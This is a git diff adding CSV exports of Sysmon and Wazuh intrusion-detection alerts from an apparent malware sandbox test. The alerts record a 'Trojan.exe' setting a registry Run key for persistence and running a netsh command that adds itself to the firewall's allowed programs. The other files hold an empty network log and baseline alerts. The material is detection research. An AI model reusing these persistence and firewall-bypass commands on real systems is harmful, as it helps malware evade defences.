HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:17.741"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:29.881",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:16.711 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:16.726786500Z"",""eventRecordID"":""1040"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:16.711\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:16.711"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:28.956",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:15.679 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:15.693022100Z"",""eventRecordID"":""1039"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:15.679\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:15.679"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:27.822",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:14.664 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:14.673922300Z"",""eventRecordID"":""1038"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:14.664\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:14.664"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:26.803",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:13.648 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:13.654650100Z"",""eventRecordID"":""1037"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:13.648\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:21:13.648"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:25.837",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:12.633 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:12.637821800Z"",""eventRecordID"":""1036"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:12.633\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:12.633"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:18:23.380",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:10.383 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:10.401572500Z"",""eventRecordID"":""1034"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:21:10.383\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:21:10.383"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:18:23.366",10,"ATT&CK T1090: Netsh","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:21:10.384 +ProcessGuid: {df9fc3d3-d1c6-5ec7-0000-00109dbf2600} +ProcessId: 1976 +Image: C:\Windows\SysWOW64\netsh.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Network Command Shell +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: netsh.exe +CommandLine: netsh firewall add allowedprogram ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ""Trojan.exe"" ENABLE +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7 +ParentProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ParentProcessId: 7072 +ParentImage: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +ParentCommandLine: ""C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe"" ""","netsh firewall add allowedprogram \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" \""Trojan.exe\"" ENABLE",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:10.401320600Z"",""eventRecordID"":""1033"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:10.384\r\nProcessGuid: {df9fc3d3-d1c6-5ec7-0000-00109dbf2600}\r\nProcessId: 1976\r\nImage: C:\\Windows\\SysWOW64\\netsh.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Network Command Shell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: netsh.exe\r\nCommandLine: netsh firewall add allowedprogram \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" \""Trojan.exe\"" ENABLE\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7\r\nParentProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nParentProcessId: 7072\r\nParentImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nParentCommandLine: \""C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:10.384"",""processGuid"":""{df9fc3d3-d1c6-5ec7-0000-00109dbf2600}"",""processId"":""1976"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\netsh.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Network Command Shell"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""netsh.exe"",""commandLine"":""netsh firewall add allowedprogram \\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" \\\""Trojan.exe\\\"" ENABLE"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=718A726FCC5EFCE3529E7A244D87F13F,SHA256=E04FB93A81C7C469BA16CEFD9B5B1FC355E86465FF24EA7B9C3FAB5C52AB2F7D,IMPHASH=C8D91522FEEE1152DC40833F6A4717E7"",""parentProcessGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""parentProcessId"":""7072"",""parentImage"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\""""}}}", diff --git a/data/MW_9_NIDS.csv b/data/MW_9_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_9_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/NULLTEST_HIDS_1.csv b/data/NULLTEST_HIDS_1.csv new file mode 100644 index 0000000..149cff3 --- /dev/null +++ b/data/NULLTEST_HIDS_1.csv 
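Review bot: MW_9_NIDS.csv holds only the export header `"@timestamp",message,"log.file.path"` with no event rows, so a reader cannot tell whether the NIDS produced no alerts for this sample or whether the Kibana export was scoped to the wrong index pattern or time window. The neighbouring exports in this commit carry timestamped rows, which makes a zero-row file ambiguous as evidence of a negative result rather than a failed capture. Since CSV has no comment syntax, I would record the export query, index pattern and time range used for this sample (and ideally the total Suricata event count, not just alert count) in a README or the per-sample result table, so "checked, nothing fired" is distinguishable from "no data collected".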
@@ -0,0 +1,297 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 4, 2020 @ 13:51:18.516",5,"Windows System error event", +"Apr 4, 2020 @ 13:51:13.876",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 13:51:13.642",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:51:12.905",4,"Summary event of the report's signatures", +"Apr 4, 2020 @ 13:51:01.485",3,"Windows Logon Success", +"Apr 4, 2020 @ 13:49:37.551",3,"Service startup type was changed", +"Apr 4, 2020 @ 13:48:30.727",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '0dc86d77d124bb6b155bb549028af3b4' +New md5sum is : 'e6e13d44f114cbf40651f4cc8c31ee88' +Old sha1sum was: 'c722c6e745e275c7f0d1d2539e58c03fd22195fa' +New sha1sum is : 'b000a4bb6e1de3be2e0ed0a9091fdbb1e48cfa38' +" +"Apr 4, 2020 @ 13:48:30.706",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'abdaf1142070594f55c16de20de0ecca' +New md5sum is : 'a69fb129b52ee626db8a1d5a59398641' +Old sha1sum was: '7a54bab4683e307c96eebc64d5244ce6417b8b7c' +New sha1sum is : '1e15b79fa9e39915b1a950ed62876ff0507a20c6' +" +"Apr 4, 2020 @ 13:48:25.019",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_29d4d' was added. +" +"Apr 4, 2020 @ 13:48:25.004",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:48:17.957",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. 
+Old md5sum was: 'cf2fddc0383906c94bd746fc28f1c4d5' +New md5sum is : 'dd94b5b765da707f26d26edcc0c09939' +Old sha1sum was: '2eaa7a7dac68d00dc822e249c351150d025f34a1' +New sha1sum is : '5ad085cb1feea21b232c593c0b65d6d7868a84ca' +" +"Apr 4, 2020 @ 13:48:17.950",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'd5462f300e2f617d362b4f3bb6d4ba99' +New md5sum is : '83049ce66cb3eebccaaf947e88b50216' +Old sha1sum was: '00a49d93f252e8a492de34d56cc2b2ba1662a192' +New sha1sum is : '84a8be37dcc1db73b38ac549419cf4bff6e2fffc' +" +"Apr 4, 2020 @ 13:48:17.144",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '25d0183d5c5629974b3c23282c14f09e' +New md5sum is : 'c5c41205bdb5bf6d475b5f80037201df' +Old sha1sum was: 'aeeefb5382709b3ffe72b88e68a1fc2869bdb3b8' +New sha1sum is : 'a2e0c231538ae78712ab1a3a541fc605fc954f9b' +" +"Apr 4, 2020 @ 13:48:15.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'f831bbb4b4e3aa71d36063136978431b' +New md5sum is : '660c9a37dafe24ad7d156238c5a03fd6' +Old sha1sum was: 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +New sha1sum is : '43d141d31fb892a664f9b819e3cf8f0a06efe4f2' +" +"Apr 4, 2020 @ 13:48:15.456",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '07296bfe9f0bfcb49184a0b811972f99' +New md5sum is : 'eb6a8bcd67bffa9b419dc7a52b2fd506' +Old sha1sum was: '79ebd2b7c3546c7dddfff35ea466cc526594382b' +New sha1sum is : '9b14e761efbe81fb7d015a2af2ad84bf1fc0cb62' +" +"Apr 4, 2020 @ 13:48:14.989",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_29d4d' was added. 
+" +"Apr 4, 2020 @ 13:48:14.957",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:48:14.770",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'e0538a3443440110bf3825bfec5e6075' +New md5sum is : 'a7359e896dce9dc4f43f826010bc86bf' +Old sha1sum was: 'e5f255d3aa180bfe02848c7ccd3f55a84325f55b' +New sha1sum is : 'b929ab004e41c0318104eddaf81133774ae0f684' +" +"Apr 4, 2020 @ 13:48:14.566",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '6021abc3342bd637a1f3e58eadc384a5' +New md5sum is : 'a5917583990985ca4870d8761fef7e73' +Old sha1sum was: '74fbcbb06a5825a47e0950f3cb6ac1c03e265d00' +New sha1sum is : 'fdf7fc3b1602a08d1d28cb92fd747fd90ad6ca9b' +" +"Apr 4, 2020 @ 13:48:14.144",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_29d4d' was added. +" +"Apr 4, 2020 @ 13:48:14.113",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_29d4d\Security' was added. +" +"Apr 4, 2020 @ 13:48:13.504",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'f831bbb4b4e3aa71d36063136978431b' +New md5sum is : '660c9a37dafe24ad7d156238c5a03fd6' +Old sha1sum was: 'fb7819f8ec0c6d77e1fe97dbacc01e76e3e5be86' +New sha1sum is : '43d141d31fb892a664f9b819e3cf8f0a06efe4f2' +" +"Apr 4, 2020 @ 13:48:11.472",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' 